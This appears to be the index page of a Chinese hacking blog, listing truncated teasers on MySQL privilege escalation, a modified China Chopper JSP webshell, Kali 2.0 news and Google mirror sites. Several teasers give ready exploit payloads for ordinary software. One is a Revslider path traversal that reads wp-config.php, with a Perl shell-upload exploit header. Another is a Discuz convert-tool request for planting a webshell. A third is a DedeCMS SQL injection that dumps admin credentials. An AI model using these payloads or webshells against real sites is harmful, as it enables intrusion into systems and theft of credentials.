MYSQL提权总结
最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。 一、利用mof提权 前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Explo...
最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。 一、利用mof提权 前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Explo...
某些朋友需求,这里简单的修改了下菜刀原作者的JSP脚本。主要是修复了一些BUG和代码优化,新增了查询自定义备份功能。 修复BUG: 1、初始化获取容器绝对路径错误如:原本路径是D:wooyun菜刀连接默认跳转到了:D:wooyunwooyun目录。 2、修改了无法连接Oracle数据库问题 3、修改了远程下载代码 4、重新压了下代码 新的服务器端代码如下:...
首先确定这个网站使用thinkphp的框架 国内很多php开源项目的代码都是使用thinkphp框架编写的,但是thinkphp框架有很多版本,如何才能知道我们使用的框架是哪个版本的呢? 在URL后面加thinkphp的目录,也有可能爆出来 这是一个tankphp的网站目录。供参考 admin是后台工程文件夹 home是前台工程 public里面用于存放CSS文件,JS文件以及网页里面的图片 Th...
Kali 2.0昨天已经在BlackHat 2015 USA上正式发布了。无论是粉丝们还是Kali官方都对这个2.0版本抱有极大的期待和热情。这是第一个基于Debian Jessie的Kali版本,此次升级最大的特点就是系统界面的设计理念更加先进,以及系统的升级方式变为滚动升级。 官方的Kali2.0介绍 1.将会保持滚动升级。 这是Kali 2.0最重要的更新,滚动升级的方式将会保证Debian...
转载自itechzero 2015.7.19 更新。新增谷歌学术列表! 原版: https://guge.io/ https://goge.ml/ https://g.zyz.me/ https://g.wen.lu/ https://gg.avpn.cc/ https://cc.rrke.cc/ https://www.ko50.com/ https://g4w.me/ https://s.bt...
漏洞细节: 这个漏洞存在于php中一个非常常用的函数中:move_uploaded_files,开发者总是用这个函数来移动上传的文件,这个函数会检查被上传的文件是否是一个合法的文件(是否是通过 HTTP 的 post 机制上传的),如果是合法的文件,则将它一定到指定目录中。 例子: move_uploaded_file ( string $filename , string $destinati...
任意读取: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php 任意上传: #!/usr/bin/perl # # Title: Slider Revolution/Showbiz Pro shell upload exploit # Author: Simo Ben yousse...
HTTP.sys远程执行代码漏洞(CVE-2015-1635,MS15-034) 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。https://technet.microsoft.com/zh-cn/library/security/MS1...
有些论坛 可能路径放在其它目录 没有utility 直接convert等 如果看到 转换程序的 data/ 目录不可写 就不用试了 不成功 http://webshell.cc/utility/convert/index.php?a=config&source=d7.2_x2.0 post提交: a=config&source=d7.2_x2.0&submit=yes&newconfig%5bta...
无需注册会员账号: Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=' or mid=@`'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,...